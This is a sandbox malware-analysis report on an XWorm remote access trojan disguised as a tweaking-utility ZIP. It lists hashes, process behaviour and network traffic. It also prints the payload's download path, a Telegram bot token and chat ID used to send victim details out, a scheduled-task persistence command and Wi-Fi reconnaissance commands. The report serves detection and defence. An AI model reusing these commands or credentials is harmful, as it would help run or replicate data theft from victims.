download:

/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip

Full analysis: https://app.any.run/tasks/9bb59c3d-5491-455c-9a24-f410162e9906
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Analysis date: December 03, 2024, 12:50:53
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
arch-doc
pastebin
telegram
evasion
crypto-regex
xworm
ims-api
generic
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=store
MD5:

57A6527690625BEA4E4F668E7DB6B2AA

SHA1:

C5799FD94999D128203E81E22C6D9FDB86E167EE

SHA256:

076E01B09F9C5CCCC273B2F7DFA1A1EFCCC1A8E8EBF98A7EEE756024B93BAD17

SSDEEP:

98304:ReH90iKCXEeHNA3qW8WBK0shMdraokjNyv/XcXtiCax6ItQV6DtPXt3yaxrKayGN:MhS/C60kAE1+nNM8KFD6XgRv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 6400)
    • Uses Task Scheduler to run other applications

      • msedge.exe (PID: 7104)
    • XWORM has been detected (YARA)

      • msedge.exe (PID: 7104)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • msedge.exe (PID: 7104)
      • EXMservice.exe (PID: 7052)
    • Executable content was dropped or overwritten

      • EXMservice.exe (PID: 7052)
      • msedge.exe (PID: 7104)
    • Found regular expressions for crypto-addresses (YARA)

      • msedge.exe (PID: 7104)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • msedge.exe (PID: 7104)
      • svchost.exe (PID: 7132)
      • svchost.exe (PID: 5712)
    • Starts CMD.EXE for commands execution

      • svchost.exe (PID: 7132)
      • svchost.exe (PID: 5712)
    • Starts application with an unusual extension

      • cmd.exe (PID: 6620)
      • cmd.exe (PID: 6948)
      • cmd.exe (PID: 7080)
      • cmd.exe (PID: 4160)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • msedge.exe (PID: 7104)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 6620)
      • cmd.exe (PID: 6948)
      • cmd.exe (PID: 7080)
      • cmd.exe (PID: 4160)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6620)
      • cmd.exe (PID: 7080)
    • Checks for external IP

      • svchost.exe (PID: 2192)
      • svchost.exe (PID: 7132)
      • svchost.exe (PID: 5712)
    • Connects to unusual port

      • msedge.exe (PID: 7104)
    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 7132)
      • svchost.exe (PID: 5712)
    • The process executes via Task Scheduler

      • msedge.exe (PID: 2928)
  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6400)
    • Attempting to use instant messaging service

      • msedge.exe (PID: 7104)
      • svchost.exe (PID: 2192)
    • Changes the display of characters in the console

      • cmd.exe (PID: 6620)
      • cmd.exe (PID: 6948)
      • cmd.exe (PID: 7080)
      • cmd.exe (PID: 4160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(7104) msedge.exe
C24SOHLqJI6SB0jBqqArfSBiV4hhZh80UuBkv76zAYYopHlVj0nQjTo6fs9XZOyjXq:%IP%
Keys
AES%Port%
Options
Splitteruf2Ak+6QAUtrBdQWdnQbgw==
USB drop namejS8ufEjvireWt1AOQ3RmoA==
Mutex6

ims-api

(PID) Process(7104) msedge.exe
Telegram-Tokens (1)7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk
Telegram-Info-Links
7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk
Get info about bothttps://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/getMe
Get incoming updateshttps://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/getUpdates
Get webhookhttps://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk
End-PointsendMessage
Args
chat_id (1)7541917888
text (1)☠ [WizWorm] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro
Token7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk
End-PointsendMessage
Args
chat_id (1)7541917888
text (1)☠ [WizWorm] New Clinet : 3C54740F7CC0F23B53E5 UserName : admin OSFullName : Microsoft Windows 10 Pro HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Token7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk
End-PointsendMessage
Args
chat_id (1)7541917888
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2024:07:22 21:58:42
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: Autoruns/
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
155
Monitored processes
29
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe exmservice.exe #XWORM msedge.exe svchost.exe schtasks.exe no specs conhost.exe no specs exmservice.exe no specs msedge.exe no specs svchost.exe cmd.exe no specs conhost.exe no specs chcp.com no specs netsh.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs netsh.exe no specs svchost.exe cmd.exe no specs conhost.exe no specs chcp.com no specs netsh.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs netsh.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
440netsh wlan show networks mode=bssidC:\Windows\SysWOW64\netsh.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Command Shell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1580"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "msedge" /tr "C:\Users\admin\AppData\Local\msedge.exe"C:\Windows\System32\schtasks.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2072\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2928"C:\Users\admin\AppData\Local\msedge.exe"C:\Users\admin\AppData\Local\msedge.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
127.0.2651.105
Modules
Images
c:\users\admin\appdata\local\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3628findstr AllC:\Windows\SysWOW64\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\user32.dll
3884chcp 65001 C:\Windows\SysWOW64\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ulib.dll
4144"C:\Users\admin\AppData\Local\Temp\Rar$EXa6400.10052\EXMservice.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa6400.10052\EXMservice.exeWinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa6400.10052\exmservice.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
4160"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidC:\Windows\SysWOW64\cmd.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4516netsh wlan show profile C:\Windows\SysWOW64\netsh.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Command Shell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
13 339
Read events
13 302
Write events
37
Delete events
0

Modification events

(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\exm.zip
(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6400) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(7104) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:msedge
Value:
C:\Users\admin\AppData\Local\msedge.exe
(PID) Process:(7104) msedge.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msedge_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
25
Suspicious files
26
Text files
88
Unknown types
5

Dropped files

PID
Process
Filename
Type
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\Autoruns\Autoruns64.exeexecutable
MD5:6AE8E963B33EE52DF761412B451B2962
SHA256:F59056339DE56820E57C961D6DDD9032BD78AF9F2333797944F4EE57B77EE2CA
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\EXMservice.exeexecutable
MD5:AAB9C36B98E2AEFF996B3B38DB070527
SHA256:C148CC14F15B71A2D3F5E6BCE6B706744F6B373A7E6C090C14F46F81D2D6E82F
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\Autoruns\autorunsc64.exeexecutable
MD5:848E852089BA84056308E184B034C302
SHA256:110651323222353E13588ADCF82F7A21FAA51422A251033A4E1163B9E95AE08A
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\Autoruns\Autoruns64a.exeexecutable
MD5:D518661B0940E2464AA8D3073599AB89
SHA256:D6AEE475688B942A2EA49BA4CC5C73CA97191AD91D7D8C2E4A57E07DCF9C9BA6
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\Autoruns\Eula.txttext
MD5:8C24C4084CDC3B7E7F7A88444A012BFC
SHA256:8329BCBADC7F81539A4969CA13F0BE5B8EB7652B912324A1926FC9BFB6EC005A
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\Autoruns\autoruns.chmchm
MD5:2C099793584365B8897FCA7A4FA397E8
SHA256:ECB58342290940A5EB6B72BE6FAA1D0AFEEC9DF5898DF3E026D75B7B08BD8F9A
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\NvidiaProfileInspector\nv.configxml
MD5:CE6D0BC7328B0FAB08DE80F292C1EAA4
SHA256:383B8DCB968B6BD0633658D9BB55C4ACAF4C85A075AA456904A42D4E4EFD5561
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\Autoruns\autorunsc64a.exeexecutable
MD5:0C790F64E69F9D9A4CBDE5E21F1A4E93
SHA256:B9C11B7701A269B8151EC8B38577FE2BB4DE1E4E1ECD7F63324454054ACF6881
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\FortniteSettings\FortniteSettings.exeexecutable
MD5:A39DE0D010E9D34DE70ABAD81F031E23
SHA256:3B4E1A5A0D85269D9491E155864E630339E292A9228DC1EB37FF61B0A657FF6E
6400WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa6400.8777\Autoruns\Autoruns.exeexecutable
MD5:17BD13EDD536269C417BA8E1B4534FBE
SHA256:6111A70DA65153E6DED71EAE2057BF6760F340476261F6E15A80479DAF9724EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
70
DNS requests
22
Threats
46

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6180
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6632
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5712
svchost.exe
GET
200
104.16.185.241:80
http://icanhazip.com/
unknown
shared
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6632
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2992
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
92.123.104.4:443
www.bing.com
Akamai International B.V.
DE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
www.bing.com
  • 92.123.104.4
  • 92.123.104.14
  • 92.123.104.11
  • 92.123.104.6
  • 92.123.104.5
  • 92.123.104.10
  • 92.123.104.16
  • 92.123.104.15
  • 92.123.104.12
whitelisted
google.com
  • 142.250.185.174
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.160.14
  • 40.126.32.68
  • 20.190.160.22
  • 40.126.32.133
  • 40.126.32.136
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.72
whitelisted
go.microsoft.com
  • 69.192.162.125
whitelisted
pastebin.com
  • 172.67.19.24
  • 104.20.4.235
  • 104.20.3.235
shared
api.telegram.org
  • 149.154.167.220
shared

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
2192
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
7104
msedge.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
7104
msedge.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
2192
svchost.exe
Potentially Bad Traffic
ET INFO playit .gg Tunneling Domain in DNS Lookup
2192
svchost.exe
Misc activity
ET INFO Tunneling Service in DNS Lookup (* .ply .gg)
7104
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
7104
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
7104
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
7104
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
No debug info